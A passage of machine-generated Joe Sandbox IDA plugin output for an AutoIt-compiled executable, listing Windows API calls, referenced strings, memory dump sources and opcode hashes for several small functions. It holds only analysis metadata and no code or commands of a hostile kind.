                                                                                  • Instruction Fuzzy Hash: C7E0AB06224660119234223A9CC197F4799CFDD350310082BF880D2267EB80CCB183F0
                                                                                  APIs
                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00220B23
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message
                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                  • API String ID: 2030045667-4017498283
                                                                                  • Opcode ID: 3285e4b1059ca744fd76e87f4bb9f859b5bce1f526b946c5f49366bed04a8180
                                                                                  • Instruction ID: d5ef2e10e2ff448694053f7601bf60c1e338178e5c556fcbbb6fe8d5c5081045
                                                                                  • Opcode Fuzzy Hash: 3285e4b1059ca744fd76e87f4bb9f859b5bce1f526b946c5f49366bed04a8180
                                                                                  • Instruction Fuzzy Hash: 7FE0D8312543183ED21037957C07F8D7B84CF19F62F20042BFB48555C39BE1656046ED
                                                                                  APIs
                                                                                    • Part of subcall function 001DF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001E0D71,?,?,?,001C100A), ref: 001DF7CE
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,001C100A), ref: 001E0D75
                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001C100A), ref: 001E0D84
                                                                                  Strings
                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001E0D7F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                  • API String ID: 55579361-631824599
                                                                                  • Opcode ID: 714ed0fa45d2368712ac1fe3829b427117342946896151ff736a430fcc38d4af
                                                                                  • Instruction ID: 02cc5b3247c10a8a252e530b5cc42ab13bf154d4b91c531237101586165c8707
                                                                                  • Opcode Fuzzy Hash: 714ed0fa45d2368712ac1fe3829b427117342946896151ff736a430fcc38d4af
                                                                                  • Instruction Fuzzy Hash: 88E06D702007418FD3619FB9E90978A7BE0BB18745F04492DE886C6651EBF0E4888BA1
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 001DE3D5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Init_thread_footer
                                                                                  • String ID: 0%)$8%)
                                                                                  • API String ID: 1385522511-30828310
                                                                                  • Opcode ID: fe44fc885e9ecbeea0b40043935ce0ccc5f23b3bd87426c84a0cc15d2ab23e52
                                                                                  • Instruction ID: 4f8c4b12ee2cf4149b92002b957b5be26626db7591ca0de37c2d18ad85e25da6
                                                                                  • Opcode Fuzzy Hash: fe44fc885e9ecbeea0b40043935ce0ccc5f23b3bd87426c84a0cc15d2ab23e52
                                                                                  • Instruction Fuzzy Hash: 58E02631411D10FBCA0DB71CFA58AAC33D1BB18321B92016BE1028F2D19B7068858684
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID: %.3d$X64
                                                                                  • API String ID: 481472006-1077770165
                                                                                  • Opcode ID: f902001ef852bb6f00f7a71d072b5d6ff3a4b31bdf6784bbd94e24f9fd02cd5f
                                                                                  • Instruction ID: 455a65b7b09d139f9cbffdae7ee9605f9297248a6645bbe496c2fbcf680f5a3f
                                                                                  • Opcode Fuzzy Hash: f902001ef852bb6f00f7a71d072b5d6ff3a4b31bdf6784bbd94e24f9fd02cd5f
                                                                                  • Instruction Fuzzy Hash: 6AD01265829218E9CB5096D0DC899FAB3FCEB29301F608453FC16D1041E774D5A86761
                                                                                  APIs
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0025232C
                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0025233F
                                                                                    • Part of subcall function 0022E97B: Sleep.KERNEL32 ref: 0022E9F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 529655941-2988720461
                                                                                  • Opcode ID: e0f9fe08f24fd72939e4f985230fa68ace5499fbbe0801882c448a9df7f7de91
                                                                                  • Instruction ID: 2153ef8df358ae7d13b38511e23369bde09464e2e28ad043e23ae126d2097b54
                                                                                  • Opcode Fuzzy Hash: e0f9fe08f24fd72939e4f985230fa68ace5499fbbe0801882c448a9df7f7de91
                                                                                  • Instruction Fuzzy Hash: 6FD022763E0310BBE668B3B0FC1FFC6BA089B00B01F1009027305AA0D0E8F0A800CB48
                                                                                  APIs
                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0025236C
                                                                                  • PostMessageW.USER32(00000000), ref: 00252373
                                                                                    • Part of subcall function 0022E97B: Sleep.KERNEL32 ref: 0022E9F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                  • String ID: Shell_TrayWnd
                                                                                  • API String ID: 529655941-2988720461
                                                                                  • Opcode ID: dfd9f33100c7ba2b97e6cd51e412d215c7076709b72803aaba82a1a0b14844a9
                                                                                  • Instruction ID: 335ed4627409bfc2f69b1992f7accca40b2f1530eb41411e59fcd0d98c1afed0
                                                                                  • Opcode Fuzzy Hash: dfd9f33100c7ba2b97e6cd51e412d215c7076709b72803aaba82a1a0b14844a9
                                                                                  • Instruction Fuzzy Hash: 56D0A9723D13107AE668B3B0AC0FFC6A6089B00B01F5009027201AA0D0E8B0A8008A48